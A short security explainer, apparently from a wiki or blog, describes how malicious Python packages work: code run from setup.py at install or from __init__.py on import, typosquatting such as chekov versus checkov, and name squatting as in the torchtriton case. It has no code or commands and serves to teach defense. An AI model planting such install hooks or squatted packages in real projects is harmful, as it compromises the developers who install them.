👾Malicious Package Techniques

Adversary Techniques

The setup.py Install Script

Always check for a setup.py file in a package.

When you pip install a package, during the install process, Python will automatically execute the setup.py file if one exists. This is why you should never run pip with sudo or administrator rights. The setup.py is an easy target for attackers, so always review the file contents. This attack vector is becoming more known, so you will most likely only catch script kiddies using it.

The __init__.py File

Every package contains an __init__.py file, because it is used to mark directories on disk as a Python package. When you import a package, the __init__.py file is automatically executed. This is how the malicious package ascii2text was able to run code to steal passwords and upload them to a web hook.

Package Name Typo Squatting

Adversaries will create package names that mimic popular packages or remove a letter so that you accidentally download their package.

For example, the malicious package chekov typo squatting on the legitimate package checkov .

checkov vs. chekov

Not only are the package names similar, but the project description is the exact same.

Package Name Squatting

Package name squatting occurs when a popular python package exists on another site (like Github) and not on pypi.org. Adversaries see this as an opportunity to claim the name on pypi.org and upload a malicious package.

This happened to PyTorch back in December of 2022. PyTorch’s preview build had a dependency called torchtriton that was hosted only on their 3rd party package indexer site, therefore an attacker was able to claim this name on pypi.org.